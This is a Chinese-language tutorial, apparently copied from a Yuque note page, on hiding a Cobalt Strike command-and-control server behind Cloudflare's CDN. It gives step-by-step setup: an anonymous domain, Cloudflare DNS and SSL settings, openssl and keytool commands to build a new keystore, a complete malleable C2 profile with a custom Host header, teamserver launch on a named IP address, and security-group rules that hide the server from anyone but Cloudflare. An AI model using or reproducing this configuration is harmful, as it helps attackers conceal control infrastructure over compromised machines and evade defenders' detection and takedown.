cloudflare cdn https cobalt strike去特征隐藏c2

1.准备一个匿名的域名 将dns 设置成 cloudflare 的dns

打开 cloudflare 主页 添加域名

添加站点后 cloudflare 会寻找现在的域名解析 扫描完后 会给出域名的dns 拿到这个dns到域名商更改 dns即可 这里以阿里云为例

2.设置SSL证书

cloudflare SSL/TLS 加密模式为 完全

选择 源服务器 创建证书 选择 证书类型

这样证书就设置好了

3. 生成 cobaltstrike 新证书

把pem和key复制下来到 服务器上 然后把cobalt strike 默认的证书文件删除 cobaltstrike.store 生成新的证书

openssl pkcs12 -export -in server.pem -inkey server.key -out cfcert.p12 -name
cloudflare_cert -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore
cfcert.store -srckeystore cfcert.p12 -srcstoretype PKCS12 -srcstorepass 123456 -
alias cloudflare_cert

4.设置c2文件

keystore 这个是生成的文件 password是证书的密码 host是域名头

https-certificate {
set keystore "cfcert.store";
set password "123456";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "c1.readteam.club";}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "c1.readteam.club";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "c1.readteam.club";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}

5.启动teamserver

./teamserver 45.114.125.131 密码 c2.profile

6.设置监听器

正常配置就好，只是注意cloudflare免费版本支持解析少量的端口，具体端口如下

http: 80、8080、8880、2052、2082、2086、2095

https: 443、2053、2083、2087、2096、8443

7.生成上线测试

可以看到数据已经被加密

c2服务器也被隐藏了

8.保护c2

保护c2 如果在云上有安全规则

访问https://www.cloudflare.com/zh-cn/，去把cloudflare的地址都加入云服务器的安全组，只允许 cloudflare链接

更新: 2025-05-09 10:20:28
原文: https://www.yuque.com/yuhui.net/network/vd9nhabr8eqhkg4g